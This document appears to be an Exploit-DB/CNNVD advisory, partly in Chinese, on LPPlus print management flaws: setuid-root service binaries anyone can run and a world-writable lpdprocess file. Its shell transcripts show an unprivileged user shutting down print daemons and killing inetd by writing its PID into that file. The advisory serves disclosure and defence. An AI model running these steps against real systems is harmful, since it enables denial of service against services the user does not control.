https://www.exploit-db.com/exploits/20192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200011-021

LPPlus创建带有全域可写权限的lpdprocess文件。本地用户通过指明交替的进程ID且使用setuiddcclpdshut程序中断lpdprocess文件中指定的进程从而中断任意进程。

source: http://www.securityfocus.com/bid/1643/info

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:

$LPHOME/bin/dccsched 
$LPHOME/bin/dcclpdser 
$LPHOME/bin/dccbkst 

These start the scheduler, LPD server and network status daemons.

$LPHOME/bin/dccshut 
$LPHOME/bin/dcclpdshut 
$LPHOME/bin/dccbkstshut

These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process.

Vulnerability #1: 

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc 
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc 
$

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$

来源:XF
名称:lpplus-process-perms-dos
链接:http://xforce.iss.net/static/5200.php
来源:BID
名称:1643
链接:http://www.securityfocus.com/bid/1643
来源:BUGTRAQ
名称:20000906MultipleSecurityHolesinLPPlus
链接:http://archives.neohapsis.com/archives/bugtraq/2000-08/0531.html